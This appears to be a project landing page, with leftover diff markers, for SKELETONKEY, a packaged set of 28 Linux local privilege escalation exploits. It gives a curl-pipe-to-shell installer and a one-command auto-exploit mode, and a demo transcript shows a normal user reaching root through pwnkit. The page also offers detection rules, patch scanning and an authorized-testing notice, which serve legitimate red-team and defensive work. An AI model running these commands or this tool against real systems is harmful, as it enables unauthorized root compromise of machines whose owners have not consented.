+ One curated binary. 28 Linux LPE exploits from + 2016 → 2026. Detection rules in the box. + One command picks the safest one and runs it. +
+ +$ curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh \
+ && skeletonkey --auto --i-know
+ ⚠ Authorized testing only — see ETHICS.md
+ + ++ Most Linux privesc tooling is broken in one of three ways: +
++ SKELETONKEY is one binary, actively maintained, with detection + rules for every CVE it bundles — same project for red and blue + teams. +
+Structural exploits + page-cache writes. No per-kernel offsets needed.
+--full-chainDefault returns EXPLOIT_FAIL honestly. With --full-chain + resolved offsets, runs the shared modprobe_path finisher.
One tested binary. --auto ranks vulnerable modules by safety and runs the safest. Honest scope reporting — never claims root it didn't actually get. No more curating stale PoC repos.
Auditd + sigma + yara + falco rules for every CVE. One command ships SIEM coverage: --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-skeletonkey.rules.
skeletonkey --scan (no sudo needed) tells you which boxes still need patching. JSON output for CI gates. Fleet-scan tool included. No SaaS, no telemetry.
Reproducible LPE environment with public CVEs across a 10-year timeline. Each module documents the bug, the trigger, and the fix. Detection rules let you practice both sides.
+--auto on a vulnerable Ubuntu 22.04 box:
$ id +uid=1000(kara) gid=1000(kara) groups=1000(kara) + +$ skeletonkey --auto --i-know +[*] auto: host=demo kernel=5.15.0-56-generic arch=x86_64 +[*] auto: scanning 28 modules for vulnerabilities... +[+] auto: dirty_pipe VULNERABLE (safety rank 90) +[+] auto: cgroup_release_agent VULNERABLE (safety rank 98) +[+] auto: pwnkit VULNERABLE (safety rank 100) + +[*] auto: 3 vulnerable modules found. Safest is 'pwnkit' (rank 100). +[*] auto: launching --exploit pwnkit... + +[+] pwnkit: writing gconv-modules cache + payload.so... +[+] pwnkit: execve(pkexec) with NULL argv + crafted envp... +# id +uid=0(root) gid=0(root) groups=0(root)+ +
+ Safety ranking goes structural escapes → + page-cache writes → + userspace cred-races → + kernel primitives → + kernel races. The goal is to never crash a + production box looking for root. +
++ Most public PoC repos hardcode offsets for one kernel build and + silently break elsewhere. SKELETONKEY refuses to ship fabricated + offsets. +
+--full-chain finisher returns EXPLOIT_OK only when a setuid bash sentinel file actually appearsEXPLOIT_FAIL with diagnosticskeletonkey --dump-offsets (parses /proc/kallsyms or /boot/System.map) and upstream the entry via PR — see CONTRIBUTING.md# Install (x86_64 / arm64; checksum-verified) +$ curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh + +# What's this box vulnerable to? (no sudo) +$ skeletonkey --scan + +# Pick the safest LPE and run it +$ skeletonkey --auto --i-know + +# Deploy detection rules (needs sudo to write into /etc/audit/rules.d/) +$ skeletonkey --detect-rules --format=auditd \ + | sudo tee /etc/audit/rules.d/99-skeletonkey.rules + +# Fleet scan — many hosts via SSH, aggregated JSON for SIEM +$ ./tools/skeletonkey-fleet-scan.sh --binary skeletonkey \ + --ssh-key ~/.ssh/id_rsa hosts.txt+
+ v0.5.0 cut 2026-05-17. 28 modules build clean + on Debian 13 (kernel 6.12) and refuse cleanly on patched hosts. + Empirical end-to-end validation on a vulnerable-kernel VM matrix + is the next roadmap item; until then, the corpus is best + understood as "compiles + detects + structurally correct + + honest on failure." +
+ +